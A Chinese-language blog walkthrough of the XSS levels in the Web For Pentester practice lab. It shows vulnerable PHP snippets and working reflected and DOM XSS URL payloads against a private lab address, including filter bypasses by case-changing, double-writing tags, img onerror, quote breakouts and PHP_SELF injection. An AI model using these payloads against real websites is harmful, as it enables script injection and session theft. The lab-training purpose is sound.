Web_For_Pentester-XSS

Web_For_Pentester渗透测试环境中的xss注入关卡部分

Example 1

典型的反射型XSS,将我们通过GET方式输入的参数name直接输出

payload:http://192.168.187.141/xss/example1.php?name=%3Cscript%3Ealert(%27xss%27)%3C/script%3E

Example 2

GET方式输入的参数name进行正则匹配过滤,使用了函数preg_replace过滤了script标签:

1
2
3
$name = $_GET['name'];
$name = preg_replace("/<script>/","",$name);
$name = preg_replace("/<\/script>/","",$name);

但我们知道preg_replace是非常不安全的,有非常多的方法可以绕过,这里我们只需要利用大写即可非常轻松的绕过过滤

payload:http://192.168.187.141/xss/example2.php?name=%3CScript%3Ealert(%27xss%27)%3C/Script%3E

Example 3

这关同样是正则匹配过滤,区别于上一关的是这里用了匹配修饰符/i,所以不论大小写都会被过滤

1
2
3
$name = $_GET['name'];
$name = preg_replace("/<script>/i","",$name);
$name = preg_replace("/<\/script>/i","",$name);

所以我们换一种方式,双写即可绕过

payload:http://192.168.187.141/xss/example3.php?name=%3Cs%3Cscript%3Ecript%3Ealert(%27xss%27)%3C/s%3C/script%3Ecript%3E

Example 4

这关通过正则匹配过滤了关键字script,并且通过修饰符/i无视大小写

1
2
3
if(preg_match("/script/i",$_GET['name'])){
die("error");
}

排除script,我们还可以通过onerror事件进行xss攻击

payload:

http://192.168.187.141/xss/example4.php?name=%3Cimg%20src=1%20onerror=alert(%22xss%22)%3E

Example 5

过滤了关键字alert,但是script未被过滤,除了alert外还有其他方法,如下

1
2
3
alert() 弹出个提示框 (确定) 
confirm() 弹出个确认框 (确定,取消)
prompt() 弹出个输入框 让你输入东西

payload:

http://192.168.187.141/xss/example5.php?name=%3Cscript%3Econfirm(%27xss%27)%3C/script%3E

http://192.168.187.141/xss/example5.php?name=%3Cscript%3Eprompt(%27xss%27)%3C/script%3E

Example 6

这关是直接将我们输入的参数name的值赋值给脚本变量a,从页面源代码也可以看出

1
2
3
4
Hello 
<script>
var $a= "hacker";
</script>

payload:

http://192.168.187.141/xss/example6.php?name=hacker%22;alert(%27xss%27);//

Example 7

这关区别在于是通过单引号闭合,所以将上一关的payload中的双引号改为单引号即可

payload:

http://192.168.187.141/xss/example7.php?name=hacker%27;alert(%27xss%27);//

Example 8

本关的源代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php 
require_once '../header.php';

if (isset($_POST["name"])) {
echo "HELLO ".htmlentities($_POST["name"]);
}
?>
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST">
Your name:<input type="text" name="name" />
<input type="submit" name="submit"/>

<?php

require_once '../footer.php';

?>

可有发现参数name经过htmlentities函数处理,这是一个可以将html标签的尖括号转义的函数,所以我们无法通过参数name进行xss攻击,仔细一看这里面还有一个可控的参数$_SERVER[‘PHP_SELF’],来看看PHP手册对这个参数的说明:

1
2
'PHP_SELF'
当前执行脚本的文件名,与 document root 有关。例如,在地址为 http://example.com/foo/bar.php 的脚本中使用 $_SERVER['PHP_SELF'] 将得到 /foo/bar.php。__FILE__ 常量包含当前(例如包含)文件的完整路径和文件名。 从 PHP 4.3.0 版本开始,如果 PHP 以命令行模式运行,这个变量将包含脚本名。之前的版本该变量不可用。

所以我们可以通过改变url来改变这个变量的值

payload:

http://192.168.187.141/xss/example8.php/%22%20method=%22POST%22%3E%20%3Cscript%3Ealert('xss')%3C/script%3E

这时看一下页面的源代码:

1
2
3
<form action="/xss/example8.php/" method="POST"> <script>alert('xss')</script>" method="POST">
Your name:<input type="text" name="name" />
<input type="submit" name="submit"/>

成功插入恶意脚本代码

Example 9

源代码:

1
2
3
<script>
document.write(location.hash.substring(1));
</script>

location.hash是指url中#后面的内容,substring(1)从第一个字符开始

payload:

http://192.168.187.141/xss/example9.php#%3Cscript%3Ealert('xss')%3C/script%3E

但是这里没有弹框,有点奇怪

文章作者: Somnus
文章链接: https://nikoeurus.github.io/2019/01/29/Web_For_Pentester-XSS/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Somnus's blog